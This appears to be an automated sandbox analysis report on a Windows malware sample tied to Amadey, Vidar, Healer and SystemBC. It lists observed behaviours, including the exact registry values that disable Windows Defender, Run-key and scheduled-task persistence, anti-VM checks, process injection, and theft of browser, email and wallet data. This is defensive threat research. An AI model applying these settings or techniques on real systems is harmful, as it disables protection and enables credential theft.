Analysis Overview
SHA256
97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2
Threat Level: Known bad
The file 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2 was found to be: Known bad.
Malicious Activity Summary
Healer family
Amadey
Healer
Detects Healer an antivirus disabler dropper
Gcleaner family
Modifies Windows Defender notification settings
Amadey family
Modifies Windows Defender Real-time Protection settings
Systembc family
Vidar family
SystemBC
GCleaner
Modifies Windows Defender DisableAntiSpyware settings
Modifies Windows Defender TamperProtection settings
Detect Vidar Stealer
Vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Uses browser remote debugging
Downloads MZ/PE file
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Checks computer location settings
Unsecured Credentials: Credentials In Files
Executes dropped EXE
Identifies Wine through registry keys
Checks BIOS information in registry
Reads data files stored by FTP clients
Windows security modification
Reads user/profile data of web browsers
Reads user/profile data of local email clients
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Looks up external IP address via web service
Suspicious use of SetThreadContext
AutoIT Executable
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Browser Information Discovery
Program crash
System Location Discovery: System Language Discovery
Unsigned PE
Enumerates physical storage devices
Kills process with taskkill
Checks processor information in registry
Modifies data under HKEY_USERS
Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Modifies system certificate store
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Delays execution with timeout.exe
Enumerates system info in registry
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-02-24 13:24
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-02-24 13:24
Reported
2025-02-24 13:26
Platform
win7-20240903-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
SystemBC
Systembc family
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\omlnpw\uxek.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\omlnpw\uxek.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\omlnpw\uxek.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\ProgramData\omlnpw\uxek.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\f87af9d1cb.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091693101\\f87af9d1cb.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091694021\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1452 set thread context of 1748 | N/A | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe |
| PID 1644 set thread context of 2444 | N/A | C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 3492 set thread context of 624 | N/A | C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 880 set thread context of 3516 | N/A | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
| File created | C:\Windows\Tasks\skotes.job | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091747001\9390d52627.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\omlnpw\uxek.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
